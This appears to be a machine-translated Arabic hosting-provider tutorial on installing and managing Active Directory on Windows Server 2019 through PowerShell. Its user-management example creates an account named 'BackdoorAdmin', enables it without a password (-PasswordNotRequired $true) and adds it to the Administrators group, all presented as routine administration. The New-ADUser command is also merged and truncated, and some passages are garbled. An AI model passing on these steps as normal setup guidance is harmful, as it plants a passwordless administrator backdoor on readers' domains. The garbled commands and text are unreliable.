أحد الابتكارات المفيدة حقًا في Windows Server 2019 هي القدرة على إدخال الخوادم دون الحاجة إلى إجراء Sysprep أو التثبيت النظيف. لم يكن نشر البنية التحتية على الخوادم الافتراضية باستخدام Windows Server أسهل.
سنتحدث اليوم عن مدى سهولة تثبيت "Active Directory" وإدارتها من خلال Powershell.
اضبط الدور
RSAT أو الخادم المحلي مع واجهة المستخدم الرسومية:تحتاج أولاً إلى إضافة الخادم إلى RSAT. يتم إضافته على الصفحة الرئيسية باستخدام اسم المجال أو عنوان IP. تأكد من إدخال تسجيل الدخول بالتنسيق
local\Administrator ، وإلا فلن يقبل الخادم كلمة المرور.
انتقل إلى إضافة مكونات وحدد AD DS.
بوويرشيل:إذا كنت لا تعرف اسم مكون النظام ، فيمكنك تشغيل الأمر والحصول على قائمة بالمكونات المتاحة وتوابعها وأسمائها.
Get-WindowsFeature
انسخ اسم المكون وتابع التثبيت.
Install-WindowsFeature -Name AD-Domain-Services
مركز إدارة Windows:
انتقل إلى "الأدوار والميزات" وحدد ADDS (خدمات مجال Active Directory).
وهذا كل شيء حرفيًا. لا يمكن حاليًا إدارة Active Directory من خلال مركز إدارة Windows. ذكره ليس أكثر من تذكير بمدى جدواه حتى الآن.
رفع الخادم إلى وحدة تحكم المجال
ولهذا نقوم بإنشاء غابة جديدة.
RSAT أو خوادم واجهة المستخدم الرسومية المحلية:نوصي بشدة أن تترك كل شيء افتراضيًا ، وجميع المكونات الموجودة خارج الصندوق تعمل بشكل جيد ولا تحتاج إلى لمسها دون الحاجة الخاصة.
بوويرشيل:تحتاج أولاً إلى إنشاء مجموعة تفرعات وتعيين كلمة مرور لها. يحتوي Powershell على نوع متغير منفصل لكلمات المرور - SecureString ، والذي يُستخدم لتخزين كلمة مرور بشكل آمن في ذاكرة الوصول العشوائي ونقلها بشكل آمن عبر الشبكة.
$pass = Read-Host -AsSecureString
يجب إدخال أي أمر cmdlet يستخدم كلمة مرور أي شخص بهذه الطريقة. أولاً ، اكتب كلمة المرور في SecureString ، ثم حدد هذا المتغير في الأمر cmdlet.
Install-ADDSForest -DomainName test.domain -SafeModeAdministratorPassword $pass
كما هو الحال في التثبيت عبر واجهة المستخدم الرسومية ، حتى الإخراج إلى وحدة التحكم هو نفسه. على عكس الخادم ذي واجهة المستخدم الرسومية ، فإن تثبيت دور وتثبيت خادم كوحدة تحكم مجال لا يتطلب إعادة تشغيل.
يستغرق تثبيت جهاز التحكم باستخدام RSAT وقتًا أطول من استخدام Powershell.
نحن ندير المجال
الآن ، لفهم مقدار اختلاف إدارة Active Directory من خلال Powershell و AD AC (مركز Active Directory الإداري) ، ضع في اعتبارك مثالين عمليين.
إنشاء مستخدم جديد
لنفترض أننا نريد إنشاء مستخدم في مجموعة Users ونريد منه تعيين كلمة مرور لنفسه. عبر AD AC ، يبدو كما يلي:
New-ADUser -Name BackdoorAdmin -UserPrincipalName BackdoorAdmin@test Get-ADUser BackdoorAdmin
لا توجد فروق بين AD DC و Powershell.
تمكين المستخدم
RSAT أو خوادم واجهة المستخدم الرسومية المحلية:من خلال واجهة المستخدم الرسومية ، يجب على المستخدم أولاً تعيين كلمة المرور المقابلة لـ GPO وفقط بعد ذلك يمكن تشغيله.
بوويرشيل:Powershell هو نفس الشيء تقريبًا ، يمكن جعل المستخدم نشطًا حتى بدون كلمة مرور.
Set-ADUser -Identity BackdoorAdmin -Enabled $true -PasswordNotRequired $true
إضافة مستخدم إلى مجموعة
RSAT أو الخادم المحلي مع واجهة المستخدم الرسومية:باستخدام AD DC ، تحتاج إلى الانتقال إلى خصائص المستخدم ، والعثور على العمود مع عضوية المستخدم في المجموعات ، والعثور على المجموعة التي نريد وضعها وإضافتها في النهاية ، ثم انقر فوق موافق.
بوويرشيل:إذا كنا لا نعرف اسم المجموعة التي نحتاجها ، فيمكننا الحصول على قائمة بها باستخدام:
(Get-ADGroup -Server localhost -Filter *).name
يمكنك الحصول على مجموعة مع جميع الخصائص مثل هذا:
Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"}
أخيرًا ، أضف المستخدم إلى المجموعة:
علاوة على ذلك ، نظرًا لحقيقة أن كل شيء كائن في Powershell ، يتعين علينا ، مثل AD DC ، أولاً الحصول على مجموعة مستخدمين ثم إضافتها إليها.
$user = Get-ADUser BackdoorAdmin
ثم أضف هذا الكائن إلى المجموعة:
Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} | Add-ADGroupMember -Members $user
وتحقق:
Get-ADGroupMember -Identity Administrators
كما ترون ، لا توجد اختلافات تقريبًا في إدارة الإعلانات من خلال AD AC و Powershell.
الاستنتاج:
إذا كنت قد واجهت بالفعل نشر م وخدمات أخرى ، فقد تكون لاحظت أوجه التشابه في النشر من خلال RSAT و Powershell ، وكيف يبدو كل شيء بالفعل. واجهة المستخدم الرسومية في جوهرها ، بعد كل شيء.
نأمل أن يكون المقال مفيدًا أو مثيرًا للاهتمام.
وأخيراً ، بضع نصائح عملية:
- لا تقم بتثبيت الأدوار الأخرى على وحدة تحكم المجال.
- استخدام BPA (أفضل محلل ممارسة) لتسريع وحدة التحكم قليلاً
- لا تستخدم مدير Enterprice المدمج ، استخدم دائمًا حسابك الخاص.
- عند نشر الخادم على عنوان IP أبيض ، مع المنافذ المعاد توجيهها أو على VSD ، تأكد من إغلاق المنفذ 389 ، وإلا فإنك ستصبح نقطة تضخيم هجمات DDoS.
نقدم أيضًا قراءة منشوراتنا السابقة:
قصة حول كيفية تحضير الأجهزة الظاهرية للعميل باستخدام مثال تعريفة
VDS Ultralight مع Server Core مقابل 99 روبل ،
وكيفية العمل مع Windows Server 2019 Core وكيفية تثبيت واجهة المستخدم الرسومية عليها ، وكيفية
إدارة الخادم باستخدام Windows Admin مركز كيفية
تثبيت Exchange 2019 على Windows Server Core 2019
نحن نقدم تعريفة محدثة UltraLite
Windows VDS مقابل 99 روبل مع تثبيت Windows Server 2019 Core.
